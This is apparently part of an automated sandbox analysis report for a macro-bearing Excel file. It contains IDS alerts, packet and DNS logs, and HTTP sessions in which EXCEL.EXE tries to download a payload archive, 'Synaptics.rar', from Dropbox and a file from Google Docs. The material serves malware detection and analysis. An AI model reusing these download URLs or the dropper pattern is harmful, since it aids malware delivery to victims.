                              Data Raw:01 dd b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 91 b8 76 56 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-30T11:11:04.207169+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.217.18.14443TCP
                              2024-12-30T11:11:05.222205+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740162.125.66.18443TCP
                              2024-12-30T11:11:06.275152+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742162.125.66.18443TCP
                              2024-12-30T11:12:13.685090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449853172.217.18.14443TCP
                              2024-12-30T11:12:14.696048+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449862162.125.66.18443TCP
                              2024-12-30T11:12:15.785998+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449869162.125.66.18443TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 30, 2024 11:11:03.602354050 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:03.602379084 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:03.602631092 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:03.602930069 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:03.602943897 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.207096100 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.207169056 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.207743883 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.207803965 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.210350037 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.210361004 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.210571051 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.214217901 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.255367041 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.609240055 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.609283924 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.609373093 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.609395981 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.610332966 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.610383034 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.610420942 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.610434055 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.610444069 CET49737443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:11:04.610450029 CET44349737172.217.18.14192.168.2.4
                              Dec 30, 2024 11:11:04.619925022 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:04.619950056 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:04.620146990 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:04.620435953 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:04.620444059 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.222134113 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.222204924 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.225684881 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.225693941 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.225939989 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.236408949 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.279336929 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.675936937 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.676004887 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.676068068 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.676318884 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.676331997 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.676342010 CET49740443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.676346064 CET44349740162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.677983999 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.677999020 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:05.678172112 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.678472996 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:05.678483963 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:06.275002003 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:06.275151968 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:06.277167082 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:06.277179003 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:06.277405024 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:06.278840065 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:06.319381952 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:06.730380058 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:06.730504036 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:11:06.730699062 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:06.730699062 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:06.730732918 CET49742443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:11:06.730745077 CET44349742162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:13.056421041 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:13.056444883 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:13.056557894 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:13.056900978 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:13.056911945 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:13.685020924 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:13.685090065 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:13.685662985 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:13.685714006 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:13.687454939 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:13.687463045 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:13.687660933 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:13.689160109 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:13.735327005 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:14.087888956 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:14.087929010 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:14.088165045 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:14.088179111 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:14.089621067 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:14.089679956 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:14.090517044 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:14.090527058 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:14.090548038 CET49853443192.168.2.4172.217.18.14
                              Dec 30, 2024 11:12:14.090555906 CET44349853172.217.18.14192.168.2.4
                              Dec 30, 2024 11:12:14.099311113 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:14.099332094 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:14.099536896 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:14.099822998 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:14.099833965 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:14.695983887 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:14.696048021 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:14.697585106 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:14.697590113 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:14.697820902 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:14.698983908 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:14.739336014 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.157618046 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.157674074 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.157737970 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.157989025 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.157995939 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.158027887 CET49862443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.158032894 CET44349862162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.159849882 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.159879923 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.160017967 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.160289049 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.160301924 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.785928011 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.785998106 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.787286997 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.787293911 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.787518024 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:15.788552999 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:15.831373930 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:16.252748966 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:16.252803087 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:16.252854109 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:16.253118992 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:16.253133059 CET44349869162.125.66.18192.168.2.4
                              Dec 30, 2024 11:12:16.253140926 CET49869443192.168.2.4162.125.66.18
                              Dec 30, 2024 11:12:16.253145933 CET44349869162.125.66.18192.168.2.4
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 30, 2024 11:11:03.595149040 CET6171553192.168.2.41.1.1.1
                              Dec 30, 2024 11:11:03.601686954 CET53617151.1.1.1192.168.2.4
                              Dec 30, 2024 11:11:04.612171888 CET5085753192.168.2.41.1.1.1
                              Dec 30, 2024 11:11:04.619338989 CET53508571.1.1.1192.168.2.4
                              Dec 30, 2024 11:12:14.091897011 CET5651253192.168.2.41.1.1.1
                              Dec 30, 2024 11:12:14.098603010 CET53565121.1.1.1192.168.2.4
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 30, 2024 11:11:03.595149040 CET192.168.2.41.1.1.10x8c77Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                              Dec 30, 2024 11:11:04.612171888 CET192.168.2.41.1.1.10x77a0Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                              Dec 30, 2024 11:12:14.091897011 CET192.168.2.41.1.1.10x90adStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 30, 2024 11:11:03.505086899 CET1.1.1.1192.168.2.40x1692No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                              Dec 30, 2024 11:11:03.505086899 CET1.1.1.1192.168.2.40x1692No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                              Dec 30, 2024 11:11:03.601686954 CET1.1.1.1192.168.2.40x8c77No error (0)docs.google.com172.217.18.14A (IP address)IN (0x0001)false
                              Dec 30, 2024 11:11:04.619338989 CET1.1.1.1192.168.2.40x77a0No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                              Dec 30, 2024 11:11:04.619338989 CET1.1.1.1192.168.2.40x77a0No error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                              Dec 30, 2024 11:11:58.393311977 CET1.1.1.1192.168.2.40x20c3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                              Dec 30, 2024 11:11:58.393311977 CET1.1.1.1192.168.2.40x20c3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                              Dec 30, 2024 11:12:14.098603010 CET1.1.1.1192.168.2.40x90adNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                              Dec 30, 2024 11:12:14.098603010 CET1.1.1.1192.168.2.40x90adNo error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                              • docs.google.com
                              • www.dropbox.com
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449737172.217.18.144437460C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2024-12-30 10:11:04 UTC192OUTGET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: docs.google.com
                              2024-12-30 10:11:04 UTC1223INHTTP/1.1 404 Not Found
                              Content-Type: text/html; charset=utf-8
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Mon, 30 Dec 2024 10:11:04 GMT
                              Strict-Transport-Security: max-age=31536000
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Content-Security-Policy: script-src 'nonce-q0GAPQFIaaKGQ1rqp0jCGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Opener-Policy: same-origin
                              Server: ESF
                              X-XSS-Protection: 0
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-12-30 10:11:04 UTC167INData Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                              Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
                              2024-12-30 10:11:04 UTC1390INData Raw: 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 56 4d 42 4c 4b 2d 63 5f 44 43 53 33 72 48 4f 74 79 49 61 77 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 3b 7d 2a
                              Data Ascii: tle><style nonce="YVMBLK-c_DCS3rHOtyIawg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
                              2024-12-30 10:11:04 UTC102INData Raw: 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                              Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                              2024-12-30 10:11:04 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449740162.125.66.184437460C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2024-12-30 10:11:05 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
                              2024-12-30 10:11:05 UTC825INHTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=MTIzNzA1OTE2MTI5MzI0NTQwOTYzMTIyNjkxODcxODU0NDEzNjI4; Path=/; Expires=Sat, 29 Dec 2029 10:11:05 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:11:05 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: 743d44fff4104ac0835ac008522b8af8
                              Connection: close
                              2024-12-30 10:11:05 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                              Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449742162.125.66.184437460C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2024-12-30 10:11:06 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: www.dropbox.com
                              2024-12-30 10:11:06 UTC825INHTTP/1.1 409 Conflict
                              Content-Security-Policy: script-src 'none'
                              Content-Security-Policy: sandbox
                              Pragma: no-cache
                              Referrer-Policy: strict-origin-when-cross-origin
                              Set-Cookie: gvc=MjE0ODY5OTQwNTE2MDE5NzI1MDgwOTMwMTIwNTY0MzA1MzgxMzM=; Path=/; Expires=Sat, 29 Dec 2029 10:11:06 GMT; HttpOnly; Secure; SameSite=None
                              X-Content-Type-Options: nosniff
                              X-Permitted-Cross-Domain-Policies: none
                              X-Robots-Tag: noindex, nofollow, noimageindex
                              X-Xss-Protection: 1; mode=block
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 1121
                              Date: Mon, 30 Dec 2024 10:11:06 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Server: envoy
                              Cache-Control: no-cache, no-store
                              Vary: Accept-Encoding
                              X-Dropbox-Response-Origin: far_remote
                              X-Dropbox-Request-Id: 5ec371f1e5264032bba55239a6d112ae
                              Connection: close
                              2024-12-30 10:11:06 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                              Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449853172.217.18.144437392C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              TimestampBytes transferredDirectionData
                              2024-12-30 10:12:13 UTC192OUTGET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                              Host: docs.google.com
                              2024-12-30 10:12:14 UTC1223INHTTP/1.1 404 Not Found
                              Content-Type: text/html; charset=utf-8
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Mon, 30 Dec 2024 10:12:13 GMT
                              Strict-Transport-Security: max-age=31536000
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Content-Security-Policy: script-src 'nonce-nlYMqffGjvrncYmiM7UWdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Cross-Origin-Opener-Policy: same-origin
                              Server: ESF
                              X-XSS-Protection: 0
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-12-30 10:12:14 UTC167INData Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                              Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
